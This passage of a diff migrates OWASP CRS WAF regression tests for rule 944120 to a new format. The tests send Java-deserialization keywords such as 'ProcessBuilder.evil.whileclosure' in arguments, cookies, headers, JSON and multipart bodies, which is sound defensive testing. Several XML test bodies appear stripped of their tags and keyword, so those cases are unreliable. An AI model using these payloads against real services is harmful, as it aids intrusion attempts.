+ dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory=test" + output: + log: + expect_ids: [944120] + - test_id: 105 desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-106 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 106 desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.prototypeserializationfactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-107 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeserializationfactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 107 desc: "Request header test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-108 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 108 desc: "XML element includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-109 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 109 desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-110 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 110 desc: "XML attribute value includes keyword 
ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-111 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 111 desc: "XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-112 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" 
+ version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log: + expect_ids: [944120] + - test_id: 112 desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-113 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log: + expect_ids: [944120] + - test_id: 113 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-114 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: 
"OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log: + expect_ids: [944120] + - test_id: 114 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-115 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" + output: + log: + expect_ids: [944120] + - test_id: 115 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-116 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 116 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + 
Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeserializationfactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-117 + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 117 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeserializationfactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-118 + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + 
-----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 118 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeserializationfactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-119 + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 119 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeserializationfactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-120 + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 120 desc: "Argument test includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-121 + - input: + dest_addr: "127.0.0.1" + port: 
80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log: + expect_ids: [944120] + - test_id: 121 desc: "Argument name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-122 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure=test" + output: + log: + expect_ids: [944120] + - test_id: 122 desc: "Cookie test includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-123 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 123 desc: "Cookie name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.whileclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-124 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.whileclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 124 desc: "Request header test includes keyword ProcessBuilder.evil.whileclosure" stages: 
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- test: ProcessBuilder.evil.whileclosure
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944120\""
- - test_title: 944120-125
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: ProcessBuilder.evil.whileclosure
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944120]
+ - test_id: 125
desc: "XML element includes keyword ProcessBuilder.evil.whileclosure"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "value"
- output:
- no_log_contains: "id \"944120\""
- - test_title: 944120-126
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "value"
+ output:
+ log:
+ no_expect_ids: [944120]
+ - test_id: 126
desc: "XML attribute name includes keyword ProcessBuilder.evil.whileclosure"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "element_value"
- output:
- no_log_contains: "id \"944120\""
- - test_title: 944120-127
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log:
+ no_expect_ids: [944120]
+ - test_id: 127
desc: "XML attribute value includes keyword ProcessBuilder.evil.whileclosure"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "element_value"
- output:
- log_contains: "id \"944120\""
- - test_title: 944120-128
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log:
+ expect_ids: [944120]
+ - test_id: 128
desc: "XML element value includes keyword ProcessBuilder.evil.whileclosure"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "ProcessBuilder.evil.whileclosure"
- output:
- log_contains: "id \"944120\""
- - test_title: 944120-129
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "ProcessBuilder.evil.whileclosure"
+ output:
+ log:
+ expect_ids: [944120]
+ - test_id: 129
desc: "Nested XML element value includes keyword ProcessBuilder.evil.whileclosure"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "ProcessBuilder.evil.whileclosure"
- output:
- log_contains: "id \"944120\""
- - test_title: 944120-130
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
